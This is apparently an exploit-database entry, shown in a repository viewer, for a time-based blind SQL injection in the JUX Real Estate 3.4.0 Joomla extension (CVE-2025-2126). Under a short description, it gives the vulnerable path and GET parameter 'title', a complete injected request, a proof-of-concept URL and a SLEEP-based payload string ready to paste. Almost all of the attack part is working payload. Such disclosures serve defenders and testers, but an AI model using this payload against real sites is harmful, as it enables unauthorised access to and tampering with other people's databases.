40ceb13974
3 changes to exploits/shellcodes/ghdb FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS) JUX Real Estate 3.4.0 - SQL Injection
44 lines
No EOL
1.4 KiB
Text
44 lines
No EOL
1.4 KiB
Text
# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
|
|
# Exploit Author: CraCkEr
|
|
# Date: 26/02/2025
|
|
# Vendor: JoomlaUX
|
|
# Vendor Homepage: https://joomlaux.com/
|
|
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
|
|
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
|
|
# Tested on: Windows 11 Pro
|
|
# Impact: Database Access
|
|
# CWE: CWE-89 - CWE-74 - CWE-707
|
|
# CVE: CVE-2025-2126
|
|
# VDB: VDB-299039
|
|
|
|
|
|
## Description
|
|
|
|
SQL injection attacks can allow unauthorized access to sensitive data, modification of
|
|
data and crash the application or make it unavailable, leading to lost revenue and
|
|
damage to a company's reputation.
|
|
|
|
|
|
Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
|
|
|
|
GET Parameter 'title' is vulnerable to SQLi
|
|
|
|
|
|
---
|
|
Parameter: title (GET)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
|
|
Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
|
|
|
|
|
|
## POC:
|
|
|
|
https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]
|
|
|
|
## Payload:
|
|
|
|
1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
|
|
|
|
|
|
|
|
[-] Done |